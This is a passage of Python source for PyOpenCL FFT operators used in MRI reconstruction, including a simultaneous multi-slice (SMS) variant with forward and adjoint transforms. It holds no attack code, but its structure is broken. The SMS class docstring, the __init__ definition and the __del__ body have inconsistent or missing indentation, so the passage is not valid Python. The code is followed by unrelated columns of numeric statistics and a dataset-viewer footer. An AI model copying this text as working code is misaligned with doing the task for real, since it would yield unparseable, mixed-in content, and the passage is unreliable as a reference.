    def FFT(self, s, sg, wait_for=None, scan_offset=0):
        """Perform the forward FFT operation.

        With fft_dim set: scale ``sg`` into the scratch array, run the
        batched forward FFT and write the masked result into ``s``. With
        fft_dim None: plain copy of ``sg`` into ``s``.

        Parameters
        ----------
        s : PyOpenCL.Array
            The uniformly gridded k-space.
        sg : PyOpenCL.Array
            The complex image data.
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan.

        Returns
        -------
        PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        if self.fft_dim is not None:
            # Scaled copy of the image into the scratch array.
            self._tmp_fft_array.add_event(
                self.prg.copy(
                    self.queue,
                    (sg.size,
                     ),
                    None,
                    self._tmp_fft_array.data,
                    sg.data,
                    self.DTYPE_real(
                        1 /
                        self.fft_scale),
                    wait_for=sg.events+self._tmp_fft_array.events+wait_for))
            # Host-side sync before handing the buffer to gpyfft.
            cl.wait_for_events(self._tmp_fft_array.events)
            fft_events = []
            for j in range(self.iternumber):
                fft_events.append(self.fft.enqueue_arrays(
                    data=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    result=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    forward=True)[0])
            return (
                self.prg.maskingcpy(
                    self.queue,
                    (self._tmp_fft_array.shape[0],
                     np.prod(self._tmp_fft_array.shape[1:])),
                    None,
                    s.data,
                    self._tmp_fft_array.data,
                    self.mask.data,
                    wait_for=s.events+fft_events))
        # fft_dim is None: identity (scale 1) copy, no FFT performed.
        return self.prg.copy(
            self.queue,
            (sg.size,
             ),
            None,
            s.data,
            sg.data,
            self.DTYPE_real(1),
            wait_for=s.events+sg.events+wait_for)
class PyOpenCLSMSNUFFT(PyOpenCLnuFFT):
"""Cartesian FFT-SMS object.
This class performs the FFT operation assuming a SMS acquisition.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict A python dict containing the necessary information to
setup the object. Needs to contain the number of slices (NSlice),
number of scans (NScan), image dimensions (dimX, dimY), number of
coils (NC), sampling points (N) and read outs (NProj)
a PyOpenCL queue (queue) and the complex coil
sensitivities (C).
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
fft_shape : tuple of ints
3 dimensional tuple. Dim 0 containts all Scans, Coils and Slices.
Dim 1 and 2 the overgridded image dimensions.
fft_scale : float32
The scaling factor to achieve a good adjointness of the forward and
backward FFT.
par_fft : int
The number of parallel fft calls. Typically it iterates over the
Scans.
fft : gpyfft.fft.FFT
The fft object created from gpyfft (A wrapper for clFFT). The object
is created only once an reused in each iterations, iterationg over
all scans to keep the memory footprint low.
mask : PyOpenCL.Array
The undersampling mask for the Cartesian grid.
packs : int
The distance between the slices
MB : int
The multiband factor
shift : PyOpenCL.Array
The vector pixel shifts used in the fft computation.
prg : PyOpenCL.Program
The PyOpenCL.Program object containing the necessary kernels to
execute the linear Operator. This will be determined by the
factory and set after the object is created.
"""
def __init__(
        self,
        ctx,
        queue,
        par,
        DTYPE=np.complex64,
        DTYPE_real=np.float32,
        streamed=False):
    """Set up the SMS Cartesian FFT operator.

    See the class docstring for parameter semantics. Beyond the plain
    Cartesian variant this reads packs, MB (multiband factor) and the
    per-slice phase shift vector from ``par``.
    """
    super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
    # In streamed mode the scan dimension is handled outside this object,
    # so dim 0 only batches coils*slices.
    if streamed:
        self.fft_shape = (
            par["NC"] *
            par["NSlice"],
            par["dimY"],
            par["dimX"])
    else:
        self.fft_shape = (
            par["NScan"] *
            par["NC"] *
            par["NSlice"],
            par["dimY"],
            par["dimX"])
    self.packs = int(par["packs"])
    self.MB = int(par["MB"])
    # Per-slice pixel shifts used by the SMS (de)collapse kernels.
    self.shift = clarray.to_device(
        self.queue, par["shift"].astype(DTYPE_real))
    # With fft_dim None the operator degenerates to the copy_SMS_* path;
    # none of the FFT machinery is set up in that case.
    if par["fft_dim"] is not None:
        # sqrt(N) normalization over the transformed axes.
        self.fft_scale = DTYPE_real(
            np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
        self._tmp_fft_array = (
            clarray.zeros(
                self.queue,
                self.fft_shape,
                dtype=DTYPE))
        # Per-scan batching only applies on GPU and in non-streamed mode.
        if par["use_GPU"] and not streamed:
            self.par_fft = int(
                self.fft_shape[0] / par["NScan"])
        else:
            self.par_fft = self.fft_shape[0]
        self.iternumber = int(self.fft_shape[0]/self.par_fft)
        self.mask = clarray.to_device(self.queue, par["mask"])
        # One in-place gpyfft plan, reused for every batch.
        self.fft = FFT(ctx, queue, self._tmp_fft_array[
            0:self.par_fft, ...],
                       out_array=self._tmp_fft_array[
                           0:self.par_fft, ...],
                       axes=self.fft_dim)
def __del__(self):
"""Explicitly delete OpenCL Objets."""
if self.fft_dim is not None:
del self._tmp_fft_array
del self.fft
del self.mask
del self.queue
del self.ctx
del self.prg
    def FFTH(self, sg, s, wait_for=None, scan_offset=0):
        """Perform the inverse (adjoint) FFT operation.

        Parameters
        ----------
        sg : PyOpenCL.Array
            The complex image data (written to).
        s : PyOpenCL.Array
            The uniformly gridded k-space compressed by the MB factor
            (read from).
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan. (Unused in this
            implementation; kept for interface compatibility.)

        Returns
        -------
          PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        if self.fft_dim is not None:
            # Unpack the MB-compressed k-space into the full batched
            # scratch array; the kernel receives mask, per-band shift,
            # packs/MB and the adjoint FFT scale (exact semantics live in
            # the copy_SMS_adjkspace kernel, not visible here).
            self._tmp_fft_array.add_event(
                self.prg.copy_SMS_adjkspace(
                    self.queue,
                    (sg.shape[0] * sg.shape[1],
                     sg.shape[-2],
                     sg.shape[-1]),
                    None,
                    self._tmp_fft_array.data,
                    s.data,
                    self.shift.data,
                    self.mask.data,
                    np.int32(self.packs),
                    np.int32(self.MB),
                    self.DTYPE_real(self.fft_scale),
                    np.int32(sg.shape[2]/self.packs/self.MB),
                    wait_for=s.events+wait_for+self._tmp_fft_array.events))
            # Host-side sync before the in-place FFT chunks below.
            cl.wait_for_events(self._tmp_fft_array.events)
            fft_events = []
            # Inverse FFT, one par_fft-sized chunk at a time, in place.
            for j in range(self.iternumber):
                fft_events.append(self.fft.enqueue_arrays(
                    data=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    result=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    forward=False)[0])
            # Copy the transformed data into sg, applying the adjoint
            # scale factor.
            return (self.prg.copy(self.queue,
                                  (sg.size,),
                                  None,
                                  sg.data,
                                  self._tmp_fft_array.data,
                                  self.DTYPE_real(self.fft_scale),
                                  wait_for=sg.events+fft_events))
        # No FFT dimension configured: the adjoint reduces to the SMS
        # unpacking alone (scale factor 1, no transform).
        return self.prg.copy_SMS_adj(
            self.queue,
            (sg.shape[0] * sg.shape[1],
             sg.shape[-2],
             sg.shape[-1]),
            None,
            sg.data,
            s.data,
            self.shift.data,
            self.mask.data,
            np.int32(self.packs),
            np.int32(self.MB),
            self.DTYPE_real(1),
            np.int32(sg.shape[2]/self.packs/self.MB),
            wait_for=s.events+sg.events+wait_for)
    def FFT(self, s, sg, wait_for=None, scan_offset=0):
        """Perform the forward FFT operation.

        Parameters
        ----------
        s : PyOpenCL.Array
            The uniformly gridded k-space compressed by the MB factor
            (written to).
        sg : PyOpenCL.Array
            The complex image data (read from).
        wait_for : list of PyopenCL.Event, None
            A List of PyOpenCL events to wait for.
        scan_offset : int, 0
            Offset compared to the first acquired scan. (Unused in this
            implementation; kept for interface compatibility.)

        Returns
        -------
          PyOpenCL.Event: A PyOpenCL event to wait for.
        """
        if wait_for is None:
            wait_for = []
        if self.fft_dim is not None:
            # Stage the image data into the scratch array, pre-dividing by
            # the FFT scale so the forward transform is properly
            # normalized.
            self._tmp_fft_array.add_event(
                self.prg.copy(
                    self.queue,
                    (sg.size,),
                    None,
                    self._tmp_fft_array.data,
                    sg.data,
                    self.DTYPE_real(1 / self.fft_scale),
                    wait_for=self._tmp_fft_array.events+sg.events+wait_for))
            # Host-side sync before the in-place FFT chunks below.
            cl.wait_for_events(self._tmp_fft_array.events)
            fft_events = []
            # Forward FFT, one par_fft-sized chunk at a time, in place.
            for j in range(self.iternumber):
                fft_events.append(self.fft.enqueue_arrays(
                    data=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    result=self._tmp_fft_array[
                        j * self.par_fft:(j + 1) * self.par_fft, ...],
                    forward=True)[0])
            # Compress the transformed k-space by the MB factor into s,
            # applying mask, per-band shift and the forward scale (kernel
            # semantics per copy_SMS_fwdkspace, not visible here).
            return (
                self.prg.copy_SMS_fwdkspace(
                    self.queue,
                    (s.shape[0] * s.shape[1], s.shape[-2], s.shape[-1]),
                    None,
                    s.data,
                    self._tmp_fft_array.data,
                    self.shift.data,
                    self.mask.data,
                    np.int32(self.packs),
                    np.int32(self.MB),
                    self.DTYPE_real(self.fft_scale),
                    np.int32(sg.shape[2]/self.packs/self.MB),
                    wait_for=s.events+fft_events+wait_for))
        # No FFT dimension configured: the forward op reduces to the SMS
        # compression alone (scale factor 1, no transform).
        return (
            self.prg.copy_SMS_fwd(
                self.queue,
                (s.shape[0] * s.shape[1], s.shape[-2], s.shape[-1]),
                None,
                s.data,
                sg.data,
                self.shift.data,
                self.mask.data,
                np.int32(self.packs),
                np.int32(self.MB),
                self.DTYPE_real(1),
                np.int32(sg.shape[2]/self.packs/self.MB),
                wait_for=s.events+sg.events+wait_for))
| 36.323122
| 79
| 0.507982
| 5,619
| 49,799
| 4.333155
| 0.063179
| 0.0345
| 0.049285
| 0.073928
| 0.929686
| 0.926565
| 0.922704
| 0.915886
| 0.913176
| 0.903277
| 0
| 0.011977
| 0.403141
| 49,799
| 1,370
| 80
| 36.349635
| 0.807186
| 0.287877
| 0
| 0.923166
| 0
| 0
| 0.020275
| 0.004519
| 0
| 0
| 0
| 0
| 0.002328
| 1
| 0.020955
| false
| 0
| 0.008149
| 0
| 0.050058
| 0.004657
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.